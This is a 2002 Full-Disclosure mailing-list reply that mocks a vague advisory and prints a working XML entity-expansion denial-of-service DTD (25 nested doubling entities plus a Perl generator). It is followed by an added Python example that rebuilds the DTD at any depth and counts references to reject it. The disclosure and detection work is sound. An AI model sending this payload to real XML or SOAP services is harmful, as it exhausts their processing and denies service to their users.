[Full-Disclosure] Re: Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD

From: Gregory Steuck (greg-fulldisclosureat_private)
Date: Mon Dec 16 2002 - 13:15:40 PST


    >>>>> "Amit" == Amit Klein <Amit.Kleinat_private> writes:
    
        Amit> Multiple vendors XML parser (and SOAP/WebServices server)
        Amit> Denial of Service attack using DTD
    
    Nice work SanctumInc! Great piece of non-disclosure! It's posts like
    this one that make Bugtraq a cheap brand name peddling place.
    
        Amit>  - Other products from other vendors are known to be
        Amit> vulnerable too
    
    Perfect, and since we are not told what the vulnerability is, we are
    left vulnerable without any way to find out where the problem lies.
    
    Fortunately, it doesn't take a rocket scientist to devise a DTD that
    takes exponential time to process without consuming a lot of memory.
    Did you have this one in mind?
    
    <?xml version="1.0"?>
    
    <!-- 
    for ($i=1; $i < $ARGV[0]; $i++) {
     $j = $i - 1;
     print <<EOF;
    <!ENTITY a$i "&a$j;&a$j;">
    EOF
    }
    -->
    
    <!DOCTYPE a [
    <!ENTITY a0 "">
    <!ENTITY a1 "&a0;&a0;">
    <!ENTITY a2 "&a1;&a1;">
    <!ENTITY a3 "&a2;&a2;">
    <!ENTITY a4 "&a3;&a3;">
    <!ENTITY a5 "&a4;&a4;">
    <!ENTITY a6 "&a5;&a5;">
    <!ENTITY a7 "&a6;&a6;">
    <!ENTITY a8 "&a7;&a7;">
    <!ENTITY a9 "&a8;&a8;">
    <!ENTITY a10 "&a9;&a9;">
    <!ENTITY a11 "&a10;&a10;">
    <!ENTITY a12 "&a11;&a11;">
    <!ENTITY a13 "&a12;&a12;">
    <!ENTITY a14 "&a13;&a13;">
    <!ENTITY a15 "&a14;&a14;">
    <!ENTITY a16 "&a15;&a15;">
    <!ENTITY a17 "&a16;&a16;">
    <!ENTITY a18 "&a17;&a17;">
    <!ENTITY a19 "&a18;&a18;">
    <!ENTITY a20 "&a19;&a19;">
    <!ENTITY a21 "&a20;&a20;">
    <!ENTITY a22 "&a21;&a21;">
    <!ENTITY a23 "&a22;&a22;">
    <!ENTITY a24 "&a23;&a23;">
    <!ENTITY a25 "&a24;&a24;">
    ]>
    
    <a>&a0;</a>
    
    Uh-oh, it turns out it's the way DTDs are supposed to work, not an
    implementation defect.
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
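A static check for the amplification the DTD above causes, as an added example that is not part of the original post. It rebuilds the posted DTD from a depth parameter (with one difference made here: the root element references the deepest entity, a&lt;depth&gt;, whereas the posted document references a0, so both cases can be compared), counts how many entity references a parser has to resolve and how many characters actually come out, and refuses a document that exceeds a reference budget before any parser touches it. The regex-based declaration scan, the function names and the budget of 10,000 references are assumptions made for this example; it handles only the internal subset with double-quoted values, no parameter or external entities.

```python
import re

# Internal-subset general entity declarations and references.
# Assumption (this example only): double-quoted values, no parameter
# entities (%name;), no external entities.
ENTITY_DECL = re.compile(r'<!ENTITY\s+([A-Za-z_][\w.-]*)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r'&([A-Za-z_][\w.-]*);')
PREDEFINED = {"lt": "<", "gt": ">", "amp": "&", "apos": "'", "quot": '"'}

# Reference budget assumed for this example; real parsers use their own
# limits (typically an expansion-ratio cap), this number is not one of them.
MAX_REFERENCES = 10_000


def generate_document(depth, root_ref=None):
    """Rebuild the posted DTD for an arbitrary depth: a0 is empty and each
    a<i> references a<i-1> twice. The root element references root_ref,
    defaulting to the deepest entity (the posted document references a0)."""
    decls = ['<!ENTITY a0 "">']
    for i in range(1, depth + 1):
        decls.append(f'<!ENTITY a{i} "&a{i - 1};&a{i - 1};">')
    root_ref = root_ref or f"a{depth}"
    return ('<?xml version="1.0"?>\n<!DOCTYPE a [\n'
            + "\n".join(decls) + f"\n]>\n<a>&{root_ref};</a>\n")


def declared_entities(doc):
    """Map entity name -> replacement text for the internal subset."""
    return dict(ENTITY_DECL.findall(doc))


def expansion_stats(entities, name):
    """Return (references, expanded_length) for fully expanding `name`:
    how many entity references a parser must resolve, and how many
    characters come out. Memoised per entity; recursion raises ValueError."""
    cache = {}

    def visit(n, stack):
        if n in PREDEFINED:
            return 0, 1
        if n in stack:
            raise ValueError(f"recursive entity reference: {n}")
        if n not in cache:
            value = entities[n]        # KeyError for an undeclared entity
            refs = length = last = 0
            for m in ENTITY_REF.finditer(value):
                length += m.start() - last
                last = m.end()
                inner_refs, inner_len = visit(m.group(1), stack | {n})
                refs += 1 + inner_refs   # this reference plus everything under it
                length += inner_len
            length += len(value) - last
            cache[n] = (refs, length)
        return cache[n]

    return visit(name, frozenset())


def document_amplification(doc):
    """Total (references, expanded_length) for the references in the
    document content, i.e. the work a parser does after reading the DTD."""
    entities = declared_entities(doc)
    end = doc.find("]>")
    body = doc[end + 2:] if end != -1 else doc
    refs = length = 0
    for m in ENTITY_REF.finditer(body):
        inner_refs, inner_len = expansion_stats(entities, m.group(1))
        refs += 1 + inner_refs
        length += inner_len
    return refs, length


def within_budget(doc, max_references=MAX_REFERENCES):
    """Accept the document only if expanding it stays under the reference
    budget. A recursive DTD is rejected as well."""
    try:
        refs, _ = document_amplification(doc)
    except ValueError:
        return False
    return refs <= max_references


if __name__ == "__main__":
    for depth in (10, 25):
        doc = generate_document(depth)
        refs, length = document_amplification(doc)
        print(f"depth {depth}: {refs} references, {length} output chars,"
              f" accepted={within_budget(doc)}")
```

With a0 empty, the depth-25 document expands to zero characters but costs 2^26 - 1 reference resolutions, which is exactly the "exponential time without much memory" shape described above; a size-based limit on the output would never fire, so the check counts references rather than bytes. Counting before parsing is the same idea that libxml2 and expat later built in as entity amplification limits.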
    



    This archive was generated by hypermail 2b30 : Wed Dec 18 2002 - 16:11:48 PST